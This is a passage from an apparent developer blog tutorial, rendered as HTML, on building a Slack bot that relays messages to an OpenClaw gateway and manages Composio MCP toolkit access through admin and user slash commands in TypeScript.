    &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;_Thinking..._&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;generateResponse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;openclawConfig&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gatewayUrl&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;openclawConfig&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;gatewayToken&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;priorHistory&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;sessionKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;saveMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;threadTs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;assistant&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;chat&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;channel&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;channelId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;thinkingMsg&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ts&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;content&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;There are a few things you might notice right away:&lt;/p&gt;

&lt;p&gt;First, we store the user's message in the database before sending it to OpenClaw. Why? That way, if the request fails, the history isn't broken, similar to persisting chat history in &lt;code&gt;localStorage&lt;/code&gt; when building web chat applications.&lt;/p&gt;
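&lt;p&gt;The save-before-send ordering can be sketched with an in-memory store (the real project persists messages to PostgreSQL via Prisma; the names below are our own):&lt;/p&gt;

```typescript
interface StoredMessage {
  role: "user" | "assistant";
  text: string;
  threadTs: string;
}

// In-memory stand-in for the Prisma-backed message table.
class MemoryStore {
  private messages: StoredMessage[] = [];
  save(msg: StoredMessage) {
    this.messages.push(msg);
  }
  history(threadTs: string): StoredMessage[] {
    return this.messages.filter((m) => m.threadTs === threadTs);
  }
}

// Persist the user's message first, then call the model. If the model
// call throws, the thread history still contains what the user said.
async function handleMessage(
  store: MemoryStore,
  threadTs: string,
  text: string,
  generate: (history: StoredMessage[]) => any,
) {
  store.save({ role: "user", text, threadTs });
  const reply = await generate(store.history(threadTs));
  store.save({ role: "assistant", text: reply, threadTs });
  return reply;
}
```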

&lt;p&gt;I'm not sure there's a better way to handle this, but right now we simply show a &lt;code&gt;Thinking...&lt;/code&gt; message while the AI generates the full response, then replace it once the final output is ready.&lt;/p&gt;

&lt;p&gt;A little hacky, maybe, but it gets the job done. There are probably better ways to handle this, like streaming the response, but for now the old-school approach works. 😋&lt;/p&gt;
&lt;h3&gt;
  
  
  Slash Commands
&lt;/h3&gt;

&lt;p&gt;The bot exposes seven slash commands split into two groups: user-facing (&lt;code&gt;/connect&lt;/code&gt;, &lt;code&gt;/connections&lt;/code&gt;, &lt;code&gt;/help&lt;/code&gt;) and admin-only (&lt;code&gt;/assign&lt;/code&gt;, &lt;code&gt;/add-mcp-config&lt;/code&gt;, &lt;code&gt;/add-auth-config&lt;/code&gt;, &lt;code&gt;/list-mcp-configs&lt;/code&gt;).&lt;/p&gt;
&lt;h4&gt;
  
  
  /connect
&lt;/h4&gt;

&lt;p&gt;&lt;code&gt;/connect &amp;lt;toolkit&amp;gt;&lt;/code&gt; starts an OAuth flow for a tool like GitHub or Gmail. But unlike the previous version where any user could connect any toolkit, now the bot checks three things before starting a connection:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Does this user have an MCP Config assigned?&lt;/li&gt;
&lt;li&gt;Is the requested toolkit in that config?&lt;/li&gt;
&lt;li&gt;Is there an auth config registered for this toolkit?
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 command.handler.ts&lt;/span&gt;

&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/connect&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ack&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;respond&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;ack&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;toolkitSlug&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;trim&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;toLowerCase&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;apiKey&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;getComposioApiKey&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;assignment&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mcpConfigAssignment&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;findUnique&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;slackUserId_slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="na"&gt;slackUserId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="na"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;team_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="na"&gt;include&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;mcpConfig&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;assignment&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;response_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ephemeral&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;You have not been assigned an MCP Config. Ask your admin to run `/assign`.&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;assignment&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mcpConfig&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toolkitSlugs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;response_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ephemeral&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;This toolkit is not available in your assigned config. &lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt;
        &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Your admin controls which toolkits you can access.&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;toolkitAuth&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mcpToolkitAuth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;findUnique&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="na"&gt;slackTeamId_toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="na"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;team_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;

  &lt;span class="c1"&gt;// check if already connected&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;connectedToolkits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getConnectedToolkits&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;apiKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;connectedToolkits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;includes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;response_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ephemeral&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;`You're already connected to *&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;*.`&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;redirectUrl&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;initiateConnection&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="nx"&gt;apiKey&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;toolkitAuth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;authConfigId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;);&lt;/span&gt;

  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;response_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ephemeral&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;`Click here to connect *&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;*: &lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;redirectUrl&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;The response is only visible to the user who ran the command. That's intentional: OAuth URLs are personal and shouldn't be exposed to the whole channel.&lt;/p&gt;
&lt;h4&gt;/assign&lt;/h4&gt;

&lt;p&gt;&lt;code&gt;/assign&lt;/code&gt; is admin-only: it assigns a specific OpenClaw gateway to a user. It opens a Slack modal to collect the gateway URL, token, and MCP Config server ID.&lt;/p&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// 👇 command.service.ts&lt;/span&gt;

&lt;span class="nx"&gt;app&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;command&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;/assign&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;async &lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ack&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;ack&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;userInfo&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;users&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;info&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user_id&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;isAdmin&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;userInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;is_admin&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="nx"&gt;userInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;user&lt;/span&gt;&lt;span class="p"&gt;?.&lt;/span&gt;&lt;span class="nx"&gt;is_owner&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

  &lt;span class="k"&gt;if &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;isAdmin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;respond&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
      &lt;span class="na"&gt;response_type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;ephemeral&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
      &lt;span class="na"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;Only workspace admins can assign OpenClaw instances.&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="p"&gt;});&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt;

  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;views&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
    &lt;span class="na"&gt;trigger_id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;command&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;trigger_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="na"&gt;view&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;assignInstanceModal&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// includes gateway URL, token, and MCP Config ID fields&lt;/span&gt;
  &lt;span class="p"&gt;});&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;The user's MCP URL looks something like this: &lt;code&gt;https://backend.composio.dev/v3/mcp/aaa-111/mcp?user_id=&amp;lt;slack_user_id&amp;gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;That URL is the key piece: it's what connects the user's OpenClaw instance to the toolkits the admin selected for them.&lt;/p&gt;
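&lt;p&gt;As a sketch, deriving that URL from the stored server ID is a one-liner. The helper name here is hypothetical, not from the actual codebase:&lt;/p&gt;

```typescript
// Hypothetical helper: build the per-user MCP URL from the Composio
// server ID stored in the assigned MCP Config.
function buildMcpUrl(composioServerId: string, slackUserId: string): string {
  return `https://backend.composio.dev/v3/mcp/${composioServerId}/mcp?user_id=${encodeURIComponent(slackUserId)}`;
}

// buildMcpUrl("aaa-111", "U0123ABC")
// → "https://backend.composio.dev/v3/mcp/aaa-111/mcp?user_id=U0123ABC"
```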
&lt;h4&gt;/add-mcp-config and /add-auth-config&lt;/h4&gt;

&lt;p&gt;These two admin commands register the Composio resources in the bot's database. Both open modals.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;/add-mcp-config&lt;/code&gt; registers an MCP Config by name and server ID:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// On modal submit:&lt;/span&gt;
&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mcpConfig&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;teamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="nx"&gt;composioServerId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// the UUID from the MCP URL&lt;/span&gt;
    &lt;span class="nx"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// e.g. "Engineering"&lt;/span&gt;
    &lt;span class="nx"&gt;toolkitSlugs&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="c1"&gt;// e.g. ["github", "linear"]&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;code&gt;/add-auth-config&lt;/code&gt; links a toolkit slug to its Composio auth config ID. This is what &lt;code&gt;/connect&lt;/code&gt; uses to know which auth config to pass when initiating a connection:&lt;br&gt;
&lt;/p&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// On modal submit:&lt;/span&gt;
&lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mcpToolkitAuth&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upsert&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;
  &lt;span class="na"&gt;where&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;slackTeamId_toolkitSlug&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;slackTeamId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;teamId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;toolkitSlug&lt;/span&gt; &lt;span class="p"&gt;},&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
